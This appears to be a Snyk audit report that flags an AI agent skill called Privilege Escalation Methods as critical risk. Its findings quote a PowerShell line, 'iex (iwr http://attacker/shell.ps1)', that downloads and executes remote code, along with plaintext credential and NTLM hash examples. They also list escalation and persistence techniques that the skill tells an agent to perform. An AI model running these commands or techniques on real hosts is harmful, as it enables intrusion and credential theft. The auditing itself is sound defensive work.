Skills
skills/claudiodearaujo/izacenter/Privilege Escalation Methods/Snyk

Privilege Escalation Methods

Fail

Audited by Snyk on Mar 10, 2026

Risk Level: CRITICAL
Full Analysis

HIGH W007: Insecure credential handling detected in skill instructions.

  • Insecure credential handling detected (high risk: 1.00). This skill includes and instructs use of plaintext credentials and secret hashes directly in commands and examples (e.g., user:password, Password123, /rc4:<NTLM_HASH>, net user Administrator Password!@#), meaning an agent would need to accept and emit secret values verbatim — creating a high exfiltration risk.

CRITICAL E005: Suspicious download URL detected in skill instructions.

  • Suspicious download URL detected (high risk: 1.00). The facebook.com link is benign by itself, but the presence of http://attacker/shell.ps1 — a direct, untrusted PowerShell (.ps1) file served over plain HTTP from an attacker-controlled host — is a clear high-risk malware distribution indicator, so the overall set is suspicious.

CRITICAL E006: Malicious code pattern detected in skill scripts.

  • Malicious code pattern detected (high risk: 1.00). The document explicitly instructs step-by-step post‑exploitation techniques — privilege escalation, credential harvesting (Mimikatz, Kerberoasting, NTLM relays), persistence (setuid shells, cron, scheduled tasks), remote code execution and domain compromise — which are deliberate malicious behaviors and backdoor patterns.

MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).

  • Potentially malicious external URL detected (high risk: 1.00). The skill contains a scheduled-task example that runs PowerShell with "iex (iwr http://attacker/shell.ps1)", which at runtime fetches and immediately executes remote code from http://attacker/shell.ps1.

MEDIUM W013: Attempt to modify system services in skill instructions.

  • Attempt to modify system services in skill instructions detected (high risk: 1.00). The skill explicitly instructs the agent to perform privilege escalation (e.g., setuid binaries, chmod +s, modify cron/system services, create scheduled tasks and new users, load drivers, extract credentials and create persistence), which directly modifies system state and encourages compromising the host.
Audit Metadata
Risk Level
CRITICAL
Analyzed
Mar 10, 2026, 01:14 AM